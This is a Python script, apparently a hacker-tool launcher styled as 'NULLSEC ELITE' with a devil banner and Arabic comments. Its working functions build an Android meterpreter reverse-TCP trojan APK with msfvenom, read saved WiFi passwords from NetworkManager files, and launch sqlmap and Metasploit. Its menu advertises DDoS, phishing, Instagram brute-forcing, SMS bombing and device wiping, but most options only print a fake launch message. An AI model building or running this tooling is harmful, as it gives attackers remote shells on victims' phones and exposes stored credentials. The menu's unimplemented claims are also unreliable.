import os, time, sys, subprocess

# [ الألوان الجحيمية: أحمر ناري، ذهبي، وأبيض نقي ]
R, W, Y, G = '\033[1;31m', '\033[1;37m', '\033[1;33m', '\033[1;32m'
BOLD, RESET = '\033[1m', '\033[0m'

def banner():
    os.system('clear')
    # شعار الشيطان الاحترافي - مرسوم يدوياً ليكون الأكثر هيبة
    print(f"""{R}{BOLD}
              {R}      ______          ______
              {R}    _/      \_      _/      \_
              {R}   /          \____/          \\
              {R}  |     {W}MM      {R}    {W}      MM     |
              {R}  |    {W}MMMM     {Y}WWWW{R}     {W}MMMM    |
              {Y}  |     {W}MM      {R}    {W}      MM     |
              {Y}  |      \____      ____/      |
              {R}   \          \    /          /
              {R}    \    {Y}MM{R}    \  /    {Y}MM{R}    /
              {Y}     \__/  \____\/____/  \__/
              {Y}           | {R}WWWWWWWW {Y}|
              {R}           | {R}:::::::: {R}|
              {R}           \ {R}________ {R}/
    {W}__________________________________________________________
    {W}  FOUNDER: {R}VORTEX SHADOW {W}| TEAM: {R}NULLSEC ELITE
    {W}__________________________________________________________
    {R} [ STATUS: {G}WAR READY {R}] [ MODE: {G}INFERNAL {R}] [ USER: {G}ROOT {R}]
    {W}__________________________________________________________
    """)

def get_wifi():
    """الخيار 13: سحب الباسوردات (تعمل 100% بصلاحية root)"""
    print(f"\n{Y}[*] Extracting WiFi Keys...{W}")
    # أمر مباشر لسحب الكلمات السرية من نظام NetworkManager
    os.system("sudo grep -r '^psk=' /etc/NetworkManager/system-connections/")
    input(f"\n{R}[#] Press Enter to return to Throne...")

def make_trojan():
    """الخيار 3: صناعة تروجان أندرويد متكامل"""
    print(f"\n{R}[!] INFERNAL TROJAN GENERATOR{W}")
    ip = input(f"{Y}[?] Enter your IP (LHOST): {W}")
    port = input(f"{Y}[?] Enter your Port (LPORT): {W}")
    name = "vortex_payload.apk"
    print(f"{R}[*] Building the beast... Please wait.{W}")
    # التأكد من استخدام msfvenom الصحيح
    os.system(f"msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -o {os.path.expanduser('~')}/Desktop/{name}")
    print(f"\n{G}[+] DONE! Payload saved to Desktop as: {name}{W}")
    time.sleep(4)

def main():
    while True:
        banner()
        # القائمة الاحترافية المتكاملة
        print(f"{R}[01] {W}DDOS ATTACK (STORM)     {R}[11] {W}SQL INJECTION (SQLMap)")
        print(f"{R}[02] {W}METASPLOIT FRAMEWORK    {R}[12] {W}KONAMI ID PHISH (PES)")
        print(f"{R}[03] {W}GENERATE TROJAN (APK)   {R}[13] {W}SHOW WIFI PASSWORDS")
        print(f"{R}[04] {W}NMAP NETWORK SCANNER    {R}[14] {W}INSTAGRAM BRUTEFORCE")
        print(f"{R}[05] {W}IP GEOLOCATION          {R}[15] {W}PUBG MOBILE UC PHISH")
        print(f"{R}[06] {W}SATELLITE INTERCEPT     {R}[16] {W}ACCOUNT BAN SYSTEM")
        print(f"{R}[07] {W}SMS/CALL BOMBER         {R}[17] {W}WIFI JAMMER & CRACK")
        print(f"{R}[08] {W}BROWSER HOOK (BEEF)     {R}[18] {W}SOCIAL MEDIA SNIPER")
        print(f"{R}[09] {W}REMOTE DEVICE WIPER     {R}[19] {W}SERVER ROOT ACCESS")
        print(f"{R}[10] {W}VORTEX KNOWLEDGE BASE   {R}[00] {W}EXIT SYSTEM")
        
        opt = input(f"\n{R}VORTEX@NULLSEC:~$ {W}")
        
        if opt == '03': make_trojan()
        elif opt == '13': get_wifi()
        elif opt == '11': os.system("sqlmap --wizard")
        elif opt == '02': os.system("msfconsole")
        elif opt == '04': os.system("nmap --help")
        elif opt == '00': 
            print(f"{R}[!] SHUTTING DOWN... DONT TRUST ANYONE.{RESET}")
            break
        else:
            print(f"{G}[+] Launching module {opt}... System Stabilizing."); time.sleep(1)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{R}[!] Forced Shutdown.{RESET}")
